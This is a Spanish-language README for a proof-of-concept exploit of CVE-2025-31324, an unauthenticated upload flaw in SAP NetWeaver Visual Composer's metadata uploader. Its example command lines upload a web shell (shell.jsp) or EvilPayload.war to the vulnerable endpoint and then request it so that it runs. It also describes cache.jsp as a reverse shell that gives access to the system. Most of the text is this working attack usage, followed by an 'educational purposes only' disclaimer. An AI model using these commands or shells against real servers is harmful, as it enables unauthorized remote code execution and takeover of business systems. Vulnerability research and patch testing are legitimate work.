
Prueba de concepto para CVE-2025-31324: Carga no autenticada en SAP NetWeaver Visual Composer Metadata Uploader
Proof-of-Concept para CVE-2025-31324: Subida no autenticada en el cargador de metadatos de SAP NetWeaver Visual Composer
Este script realiza:
Ejemplo de uso:
python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000
--endpoint /developerserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
También tienes la capacidad de subir un archivo .war si así deseas ejecutarlo. cache.jsp es una reverse shell que te dará acceso una vez dentro del sistema. (Todavía estamos solucionando problemas allí)
Esto está destinado únicamente a fines educativos y no debe utilizarse para actividades maliciosas. Asegúrate siempre de tener los permisos necesarios y de seguir las pautas éticas al probar o investigar vulnerabilidades de seguridad.
Para cualquier pregunta o aclaración, no dudes en contactarnos. ¡Mantente seguro y protegido!